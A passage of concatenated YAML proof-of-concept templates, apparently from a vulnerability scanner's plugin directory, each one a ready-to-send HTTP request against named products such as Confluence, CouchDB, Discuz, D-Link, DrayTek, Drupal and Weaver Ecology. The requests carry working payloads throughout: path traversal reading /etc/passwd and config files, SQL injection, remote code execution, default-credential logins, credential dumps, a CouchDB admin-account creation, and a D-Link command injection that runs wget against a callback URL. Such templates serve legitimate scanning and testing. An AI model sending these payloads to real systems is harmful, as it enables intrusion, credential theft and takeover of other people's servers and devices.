https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/citrix-xenmobile-cve-2020-8209.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-xenmobile-cve-2020-8209 2 | rules: 3 | - method: GET 4 | path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: B1anda0(https://github.com/B1anda0) 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/coldfusion-cve-2010-2861-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coldfusion-cve-2010-2861-lfi 2 | rules: 3 | - method: GET 4 | path: >- 5 | /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=") 9 | detail: 10 | version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions 11 | author: sharecast 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 -------------------------------------------------------------------------------- /src/plugins/pocs/confluence-cve-2015-8399.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2015-8399 2 | rules: 3 | - method: GET 4 | path: /spaces/viewdefaultdecorator.action?decoratorName 5 | follow_redirects: false 6 | expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator") 7 | detail: 8 | author: whynot(https://github.com/notwhy) 9 | links: 10 | - https://www.anquanke.com/vul/id/1150798 -------------------------------------------------------------------------------- /src/plugins/pocs/confluence-cve-2019-3396-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2019-3396-lfi 2 | rules: 3 | - method: POST 4 | path: /rest/tinymce/1/macro/preview 5 | headers: 6 | Content-Type: "application/json" 7 | Host: localhost 8 | Referer: http://localhost 9 | body: >- 10 | {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}} 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"contextConfigLocation") 14 | detail: 15 | author: sharecast 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396 -------------------------------------------------------------------------------- /src/plugins/pocs/confluence-cve-2021-26084.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2021-26084 2 | set: 3 | r1: randomInt(100000, 999999) 4 | r2: randomInt(100000, 999999) 5 | rules: 6 | - method: POST 7 | path: /pages/createpage-entervariables.action?SpaceKey=x 8 | body: | 9 | queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 12 | detail: 13 | author: Loneyer(https://github.com/Loneyers) 14 | links: 15 | - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/confluence-cve-2021-26085-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read 2 | set: 3 | rand: randomLowercase(6) 4 | rules: 5 | - method: GET 6 | path: /s/{{rand}}/_/;/WEB-INF/web.xml 7 | follow_redirects: false 8 | expression: response.status == 200 && response.body.bcontains(b"Confluence") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig") 9 | detail: 10 | author: wulalalaaa(https://github.com/wulalalaaa) 11 | links: 12 | - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/consul-rexec-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-rexec-rce 2 | rules: 3 | - method: GET 4 | path: /v1/agent/self 5 | expression: | 6 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false") 7 | detail: 8 | author: imlonghao(https://imlonghao.com/) 9 | links: 10 | - https://www.exploit-db.com/exploits/46073 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/consul-service-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-service-rce 2 | rules: 3 | - method: GET 4 | path: /v1/agent/self 5 | expression: | 6 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true") 7 | detail: 8 | author: imlonghao(https://imlonghao.com/) 9 | links: 10 | - https://www.exploit-db.com/exploits/46074 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/coremail-cnvd-2019-16798.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coremail-cnvd-2019-16798 2 | rules: 3 | - method: GET 4 | path: >- 5 | /mailsms/s?func=ADMIN:appState&dumpConfig=/ 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(bytes("")) 9 | detail: 10 | author: cc_ci(https://github.com/cc8ci) 11 | links: 12 | - https://www.secpulse.com/archives/107611.html -------------------------------------------------------------------------------- /src/plugins/pocs/couchcms-cve-2018-7662.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchcms-cve-2018-7662 2 | rules: 3 | - method: GET 4 | path: /includes/mysql2i/mysql2i.func.php 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in") 8 | - method: GET 9 | path: /addons/phpmailer/phpmailer.php 10 | follow_redirects: false 11 | expression: > 12 | response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in") 13 | detail: 14 | author: we1x4n(https://we1x4n.github.io/) 15 | links: 16 | - https://github.com/CouchCMS/CouchCMS/issues/46 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/couchdb-cve-2017-12635.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchdb-cve-2017-12635 2 | set: 3 | r1: randomLowercase(32) 4 | rules: 5 | - method: PUT 6 | path: '/_users/org.couchdb.user:{{r1}}' 7 | headers: 8 | Content-Type: application/json 9 | Content-Length: '192' 10 | body: |- 11 | { 12 | "type": "user", 13 | "name": "{{r1}}", 14 | "roles": ["_admin"], 15 | "roles": [], 16 | "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9" 17 | } 18 | follow_redirects: false 19 | expression: | 20 | response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1)) 21 | detail: 22 | author: j4ckzh0u(https://github.com/j4ckzh0u) 23 | links: 24 | - https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 25 | -------------------------------------------------------------------------------- /src/plugins/pocs/couchdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchdb-unauth 2 | rules: 3 | - method: GET 4 | path: /_config 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://www.seebug.org/vuldb/ssvid-91597 -------------------------------------------------------------------------------- /src/plugins/pocs/datang-ac-default-password-cnvd-2021-04128.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-datang-ac-default-password-cnvd-2021-04128 2 | rules: 3 | - method: POST 4 | path: /login.cgi 5 | follow_redirects: false 6 | body: >- 7 | user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95 8 | expression: | 9 | response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_") 10 | 11 | detail: 12 | author: B1anda0(https://github.com/B1anda0) 13 | links: 14 | - https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128 -------------------------------------------------------------------------------- /src/plugins/pocs/dedecms-carbuyaction-fileinclude.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-carbuyaction-fileinclude 2 | rules: 3 | - method: GET 4 | path: /plus/carbuyaction.php?dopost=return&code=../../ 5 | headers: 6 | Cookie: code=alipay 7 | follow_redirects: true 8 | expression: | 9 | response.status == 200 10 | - method: GET 11 | path: /plus/carbuyaction.php?dopost=return&code=../../ 12 | headers: 13 | Cookie: code=cod 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes("Cod::respond()")) 17 | 18 | detail: 19 | author: harris2015(https://github.com/harris2015) 20 | Affected Version: "DedeCmsV5.x" 21 | links: 22 | - https://www.cnblogs.com/milantgh/p/3615986.html 23 | -------------------------------------------------------------------------------- /src/plugins/pocs/dedecms-cve-2018-6910.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-6910 2 | rules: 3 | - method: GET 4 | path: /include/downmix.inc.php 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()")) 7 | detail: 8 | author: PickledFish(https://github.com/PickledFish) 9 | links: 10 | - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md -------------------------------------------------------------------------------- /src/plugins/pocs/dedecms-cve-2018-7700-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-7700-rce 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field} 8 | follow_redirects: true 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: harris2015(https://github.com/harris2015) 13 | Affected Version: "V5.7SP2正式版(2018-01-09)" 14 | links: 15 | - https://xz.aliyun.com/t/2224 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/dedecms-membergroup-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-membergroup-sqli 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'` 8 | follow_redirects: true 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: harris2015(https://github.com/harris2015) 13 | Affected Version: "5.6,5.7" 14 | links: 15 | - http://www.dedeyuan.com/xueyuan/wenti/1244.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/dedecms-url-redirection.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-url-redirection 2 | rules: 3 | - method: GET 4 | path: >- 5 | /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t 6 | follow_redirects: false 7 | expression: > 8 | response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com" 9 | detail: 10 | author: cc_ci(https://github.com/cc8ci) 11 | Affected Version: "V5.7 sp1" 12 | links: 13 | - https://blog.csdn.net/ystyaoshengting/article/details/82734888 -------------------------------------------------------------------------------- /src/plugins/pocs/discuz-ml3x-cnvd-2019-22239.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-ml3x-cnvd-2019-22239 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /forum.php 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 10 | search: cookiepre = '(?P[\w_]+)' 11 | - method: GET 12 | path: /forum.php 13 | headers: 14 | Cookie: "{{token}}language=sc'.print(md5({{r1}})).'" 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) 18 | detail: 19 | author: X.Yang 20 | Discuz_version: Discuz!ML 3.x 21 | links: 22 | - https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239 23 | -------------------------------------------------------------------------------- /src/plugins/pocs/discuz-v72-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-v72-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info: MySQL Query Error") 9 | detail: 10 | author: leezp 11 | Affected Version: "discuz <=v7.2" 12 | vuln_url: "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20" 13 | links: 14 | - https://blog.csdn.net/weixin_40709439/article/details/82780606 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/discuz-wechat-plugins-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-wechat-plugins-unauth 2 | rules: 3 | - method: GET 4 | path: '/plugin.php?id=wechat:wechat&ac=wxregister' 5 | follow_redirects: false 6 | expression: | 7 | response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com") 8 | detail: 9 | author: JrD 10 | links: 11 | - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/discuz-wooyun-2010-080723.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-wooyun-2010-080723 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /viewthread.php?tid=10 8 | headers: 9 | Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}})); 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 13 | detail: 14 | version: Discuz 7.x/6.x 15 | author: Loneyer 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/django-CVE-2018-14574.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-django-CVE-2018-14574 2 | 3 | rules: 4 | - method: GET 5 | path: //www.example.com 6 | follow_redirects: false 7 | expression: response.status == 301 && response.headers['location']=="//www.example.com/" 8 | 9 | detail: 10 | author: ivan 11 | links: 12 | - https://github.com/vulhub/vulhub/tree/master/django/CVE-2018-14574 -------------------------------------------------------------------------------- /src/plugins/pocs/dlink-850l-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-850l-info-leak 2 | rules: 3 | - method: POST 4 | path: /hedwig.cgi 5 | headers: 6 | Content-Type: text/xml 7 | Cookie: uid=R8tBjwtFc8 8 | body: |- 9 | ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml 10 | follow_redirects: false 11 | expression: > 12 | response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"") && response.body.bcontains(b"") && response.body.bcontains(b"OK") 13 | detail: 14 | author: cc_ci(https://github.com/cc8ci) 15 | Affected Version: "Dir-850L" 16 | links: 17 | - https://xz.aliyun.com/t/2941 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/dlink-cve-2019-16920-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2019-16920-rce 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: /apply_sec.cgi 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: >- 11 | html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}} 12 | follow_redirects: true 13 | expression: | 14 | response.status == 200 && reverse.wait(5) 15 | detail: 16 | author: JingLing(https://hackfun.org/) 17 | links: 18 | - https://www.anquanke.com/post/id/187923 19 | - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/dlink-cve-2019-17506.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2019-17506 2 | rules: 3 | - method: POST 4 | path: /getcfg.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"") && response.body.bcontains(b"") 11 | detail: 12 | author: l1nk3r,Huasir(https://github.com/dahua966/) 13 | links: 14 | - https://xz.aliyun.com/t/6453 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/dlink-cve-2020-25078-account-disclosure.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2020-25078-account-disclosure 2 | rules: 3 | - method: GET 4 | path: >- 5 | /config/getuser?index=0 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") 9 | 10 | detail: 11 | author: kzaopa(https://github.com/kzaopa) 12 | links: 13 | - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/dlink-cve-2020-9376-dump-credentials.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2020-9376-dump-credentials 2 | rules: 3 | - method: POST 4 | path: /getcfg.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: >- 8 | SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 9 | expression: > 10 | response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"Admin") && response.body.bcontains(b"") && response.body.bcontains(b"") 11 | detail: 12 | author: x1n9Qi8 13 | Affected Version: "Dlink DIR-610" 14 | links: 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/docker-api-unauthorized-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-docker-api-unauthorized-rce 2 | rules: 3 | - method: GET 4 | path: /info 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir") 8 | 9 | detail: 10 | author: j4ckzh0u(https://github.com/j4ckzh0u) 11 | links: 12 | - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/docker-registry-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-docker-registry-api-unauth 2 | rules: 3 | - method: GET 4 | path: /v2/ 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0") 8 | - method: GET 9 | path: /v2/_catalog 10 | follow_redirects: false 11 | expression: > 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - http://www.polaris-lab.com/index.php/archives/253/ 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/dotnetcms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dotnetcms-sqli 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(1, 100) 5 | rules: 6 | - method: GET 7 | path: /user/City_ajax.aspx 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 11 | - method: GET 12 | path: >- 13 | /user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2-- 14 | follow_redirects: false 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) 17 | detail: 18 | Affected Version: "v1.0~v2.0" 19 | links: 20 | - https://www.cnblogs.com/rebeyond/p/4951418.html 21 | - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742 22 | -------------------------------------------------------------------------------- /src/plugins/pocs/draytek-cve-2020-8515.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-draytek-cve-2020-8515 2 | rules: 3 | - method: POST 4 | path: /cgi-bin/mainfunction.cgi 5 | headers: 6 | Content-Type: text/plain; charset=UTF-8 7 | body: >- 8 | action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && "root:[x*]:0:0:".bmatches(response.body) 11 | detail: 12 | author: Soveless(https://github.com/Soveless) 13 | Affected Version: "Vigor2960, Vigor300B, Vigor3900 < v1.5.1, VigorSwitch20P2121, VigorSwitch20G1280, VigorSwitch20P1280, VigorSwitch20G2280, VigorSwitch20P2280 <= v2.3.2" 14 | links: 15 | - https://github.com/imjdl/CVE-2020-8515-PoC 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/druid-monitor-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-druid-monitor-unauth 2 | rules: 3 | - method: GET 4 | path: /druid/index.html 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") 7 | detail: 8 | author: met7or 9 | links: 10 | - https://github.com/alibaba/druid 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/drupal-cve-2014-3704-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-drupal-cve-2014-3704-sqli 2 | rules: 3 | - method: POST 4 | path: /?q=node&destination=node 5 | body: >- 6 | pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or 7 | updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a 8 | follow_redirects: false 9 | expression: | 10 | response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") 11 | detail: 12 | Affected Version: "Drupal < 7.32" 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704 -------------------------------------------------------------------------------- /src/plugins/pocs/dubbo-admin-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dubbo-admin-default-password 2 | groups: 3 | root: 4 | - method: GET 5 | path: / 6 | headers: 7 | Authorization: Basic cm9vdDpyb290 8 | expression: | 9 | response.status == 200 && response.body.bcontains(b"Dubbo Admin") && response.body.bcontains(b": root', '/logout'") && response.body.bcontains(b"/sysinfo/versions") 10 | guest: 11 | - method: GET 12 | path: / 13 | headers: 14 | Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 15 | expression: | 16 | response.status == 200 && response.body.bcontains(b"Dubbo Admin") && response.body.bcontains(b": guest', '/logout'") && response.body.bcontains(b"/sysinfo/versions") 17 | detail: 18 | author: mumu0215(https://github.com/mumu0215) 19 | links: 20 | - https://www.cnblogs.com/wishwzp/p/9438658.html 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/duomicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-duomicms-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005))) 6 | follow_redirects: false 7 | expression: | 8 | response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935") 9 | detail: 10 | author: hanxiansheng26(https://github.com/hanxiansheng26) 11 | Affected Version: "duomicms<3.0" 12 | links: 13 | - https://xz.aliyun.com/t/2828 -------------------------------------------------------------------------------- /src/plugins/pocs/dvr-cve-2018-9995.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dvr-cve-2018-9995 2 | rules: 3 | - method: GET 4 | path: >- 5 | /device.rsp?opt=user&cmd=list 6 | headers: 7 | Cookie: uid=admin 8 | follow_redirects: true 9 | expression: > 10 | response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback") 11 | detail: 12 | author: cc_ci(https://github.com/cc8ci) 13 | Affected Version: "DVR" 14 | links: 15 | - https://s.tencent.com/research/bsafe/474.html -------------------------------------------------------------------------------- /src/plugins/pocs/e-office-v10-sql-inject.yml: -------------------------------------------------------------------------------- 1 | name: e-office-v10-sql-inject 2 | rules: 3 | - method: GET 4 | path: /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b'

未找到相关数据

') 8 | detail: 9 | author: Print1n(https://github.com/Print1n) 10 | description: | 11 | 泛微 eoffice v10 前台 SQL 注入 12 | FOFA:fid="2csJpuWtfTdSAavIfJTuBw==" 13 | links: 14 | - https://www.hedysx.com/2777.html 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/e-zkeco-cnvd-2020-57264-read-file.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-e-zkeco-cnvd-2020-57264-read-file 2 | rules: 3 | - method: GET 4 | path: /iclock/ccccc/windows/win.ini 5 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 6 | detail: 7 | author: ThestaRY (https://github.com/ThestaRY7/) 8 | links: 9 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264 10 | info: E-ZKEco readfileCNVD-2020-57264 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/ecology-filedownload-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-filedownload-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/weaver/") 8 | detail: 9 | author: l1nk3r 10 | links: 11 | - https://www.weaver.com.cn/cs/securityDownload.asp 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/ecology-javabeanshell-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-javabeanshell-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /weaver/bsh.servlet.BshServlet 8 | body: >- 9 | bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 13 | detail: 14 | author: l1nk3r 15 | links: 16 | - https://www.weaver.com.cn/cs/securityDownload.asp -------------------------------------------------------------------------------- /src/plugins/pocs/ecology-springframework-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-springframework-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/weaver/") 8 | detail: 9 | author: l1nk3r 10 | links: 11 | - https://www.weaver.com.cn/cs/securityDownload.asp 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/ecology-syncuserinfo-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-syncuserinfo-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: MaxSecurity(https://github.com/MaxSecurity) 14 | links: 15 | - https://www.weaver.com.cn/ 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/ecology-v8-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-v8-sqli 2 | set: 3 | r1: randomInt(1000, 9999) 4 | r2: randomInt(1000, 9999) 5 | rules: 6 | - method: GET 7 | path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+{{r1}}*{{r2}}+as+id 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 11 | 12 | detail: 13 | author: Print1n(http://print1n.top) 14 | links: 15 | - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/ecshop-cnvd-2020-58823-sqli.yml: -------------------------------------------------------------------------------- 